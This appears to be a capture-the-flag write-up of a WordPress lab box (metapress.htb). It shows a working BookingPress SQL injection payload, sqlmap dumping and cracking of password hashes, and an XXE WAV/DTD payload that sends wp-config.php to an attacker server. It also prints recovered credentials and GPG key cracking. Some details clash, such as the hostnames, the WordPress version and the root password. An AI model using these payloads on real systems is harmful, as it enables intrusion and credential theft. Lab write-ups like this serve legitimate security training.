Quick Look
- Rustscan
Open 10.10.11.180:21
Open 10.10.11.180:22
Open 10.10.11.180:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 14:53 EST
Initiating Ping Scan at 14:53
Scanning 10.10.11.180 [2 ports]
Completed Ping Scan at 14:53, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 14:53
Scanning shoppy.htb (10.10.11.180) [2 ports]
Discovered open port 22/tcp on 10.10.11.180
Discovered open port 80/tcp on 10.10.11.180
Completed Connect Scan at 14:53, 0.05s elapsed (2 total ports)
Nmap scan report for shoppy.htb (10.10.11.180)
Host is up, received syn-ack (0.046s latency).
Scanned at 2022-11-21 14:53:37 EST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
- Web Browser
- Looks like a WordPress website running WordPress 5.2.6
- Handful of pages
- Host name
- http://metapress.htb
sudo echo "10.10.11.180 metapress.htb" >> /etc/hosts
- Directory Brute force
about [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 496ms]
login [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 455ms]
events [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 449ms]
0 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 400ms]
feed [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 443ms]
atom [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 407ms]
s [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 442ms]
a [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 421ms]
wp-content [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 67ms]
c [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 448ms]
admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 417ms]
t [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 416ms]
e [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 956ms]
h [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1557ms]
rss2 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1523ms]
About [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1577ms]
ca [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1119ms]
event [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1112ms]
wp-includes [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 50ms]
C [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1350ms]
A [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1178ms]
S [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1846ms]
E [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1520ms]
about-us [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1520ms]
Events [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1571ms]
T [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1212ms]
H [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1403ms]
sa [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 2129ms]
rdf [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1609ms]
page1 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1200ms]
sample [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1464ms]
' [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1331ms]
th [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1685ms]
CA [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 855ms]
dashboard [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1413ms]
he [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1498ms]
ab [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1936ms]
%20 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1347ms]
sam [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1422ms]
hello [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1391ms]
ev [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1424ms]
wp-admin [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 49ms]
cancel [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1326ms]
eve [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 2005ms]
can [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1467ms]
0000 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1780ms]
2022 [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1178ms]
Event [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1273ms]
About-Us [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1328ms]
hello-world [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1529ms]
embed [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1373ms]
abo [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1804ms]
hell [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1260ms]
SA [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1665ms]
AB [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1384ms]
Hello [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1747ms]
Oasis - 'Definitely Maybe' [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1447ms]
TH [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1319ms]
EVENTS [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1660ms]
Cancel [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1736ms]
Sample [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1457ms]
[Status: 200, Size: 10342, Words: 423, Lines: 156, Duration: 1541ms]
! [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1495ms]
ABOUT [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1827ms]
hel [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1610ms]
Bling! [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1308ms]
EV [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1275ms]
Check Screenshots! [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1234ms]
Check All Tracker Features! [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1236ms]
About Us [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1501ms]
CAN [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1165ms]
yahoo! [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1179ms]
About%20Us [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1424ms]
SAM [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1779ms]
Welcome! [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1892ms]
:: Progress: [87664/87664] :: Job [1/1] :: 23 req/sec :: Duration: [0:54:16] :: Errors: 0 ::
- VHOSTS
Next Step
- scan for users
wpscan --url http://metapress.htb/ --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <================================================================================> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://metapress.htb/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Sitemap (Aggressive Detection)
| - http://metapress.htb/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] manager
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
With these scans I discovered that their appears to be no plugins and one theme Twenty Twenty-One. Their also appeared to be 2 users admin and manager both of which I ran multiple workforce attempts against using the following commands.
wpscan --url http://metapress.htb -t 100 -e -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt -U 'manager,admin'
After this failed I moved on to looking at the websites source code.
Event plugin
As I began looking through the source code of the website I stubble on to the http://metapress.htb/events this tab was powered by the BookingPress plugin which is vulnerable to unauthenticated SQL injection. Once I figured out the vulnerability I only had to find the correct CVE and POC. Copying the POC from the website I edited it in my favorite text editor. I first changed the URL to http://metapress.htb and then I opened the http://metapress.htb/events and searched the source code for _wpnonce which is the key that is hard coded in to the html to keep the user from sending arbitrary requests like what we want to do.
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
I then pasted it in to the terminal and ran it.
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 13 Dec 2022 01:30:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.0.24
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
Exploiting the Database
The first thing I did was to take the curl command and run it with the -v command for verbose. I then copied out the header and the URL and created a request.txt file for sqlmap with the * representing the injection point.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.85.0
Accept: */*
Content-Length: 158
Content-Type: application/x-www-form-urlencoded
action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=*
Taking this file a ran sqlmap -r request.txt -p total_services --batch to make sure the request file was working. I then started enumerating the available databases sqlmap -r request.txt -p total_services --dbs . With the results from this command I decided to enumerate the blog database using this command sqlmap -r request.txt -p total_services -D blog --tables. Finally I dumped the contains of the wp_users table using the sqlmap -r request.txt -p total_services -D blog -T wp_users --dump .
Database: blog
Table: wp_users
[2 entries]
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. | admin@metapress.htb | admin | 0 | admin | admin | 2022-06-23 17:58:28 | <blank> |
| 2 | <blank> | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager | 0 | manager | manager | 2022-06-23 18:07:55 | <blank> |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
Taking these hashes from sqlmap I pasted them in to a text file on separate lines and ran hashcat using the rockyou database hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt. After a few seconds I discoverer the password for manager is partylikearockstar. Using this information I went to http://metapress.htb/wp-admin and logged.
Taking Over WordPress
After logging-in in to WordPress as manager I looked around and discovered the only privilege the manger user had was to upload media to the WordPress website. I did some research and discovered that their is a CVE for WordPress 5.6.2. This CVE allows an authenticated user to view files on the system through a XXE vulnerability when processing WAV and MP3 files.
The first thing to do the exploit this vulnerability is to create a file called payload.wav and put the following contain in it.
RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:1234/payload_dtd.dtd'"'"'>%remote;%init;%trick;]>\x00
I then created a new file called payload_dtd.dtd and placed the following contain in it.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://IPADDRESS:1234/?p=%file;'>" >
I then started a PHP file servers php -S 0.0.0.0:1234 and uploaded the payload.wav file to WordPress. I then copied the base64 encoded result and pasted it in to a new PHP file called decode.php.
<?php echo zlib_decode(base64_decode('DATA GOES HERE')); ?>
After running this command I looked through the contain of the wp-config.php and saw that their was an ftp server with the credentials metapress.htb:9NYS_ii@FyL_p5M2NvJ. Using FileZilla I connected to the ftp server. Navigating through the files to /mailer/send_mail.php. I downloaded this file and opened it. Looking through the file I discovered a new password for jnelson jnelson:Cb4_JmWM8zUZWMu@Ys. With this information I opened the terminal, ssh in to the Metapress.htb server, and opened the flag.txt.
jnelson@meta2:~$ cat user.txt
47924baef081b516a973843cd82907d6
Privilege Escalation
The next thing I did was browse around the home directory. While I was looking around I discovered a directory called .passpie. Inside the .passpie directory I found a file called .key and a directory called ssh in the ssh directory I found two files called root.pass and jnelson.pass. After discovering these files I decided to try running the command passpie to see if thier was such a command and to my surprise their was. Armed with this information I looked around on the internet and discovered passpie is a command line password manger that uses the GPG key on your Linux device to encrypt the passwords. Using the help I figured out I had to run the passpie export password_out.txt command to export the saved passwords to a text file called password_out.txt. After trying this command I discovered I needed a password to decrypt the GPG key. Remembering that I had see a file called .key I want back to it and discovered it was a GPG and PGP key file. I opened the .key file and copied the PGP key out of the file and pasted it in a new file. using the gpg2john command I converted the PGP key to a hash that can be cracked using John the Ripper.
gpg2john pgp_file.txt > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
After only a few seconds of brute forcing John discovered that the password was blink182. Taking this password I went back to the target machine and ran the passpie export password_out.txt command, entering in the password that I found. I then opened the password_out.txt file and copied the root ssh password Cb4_JmWM8zUZWMu@Ys. Finally I ran the su root command, entered my password, and opened the root.txt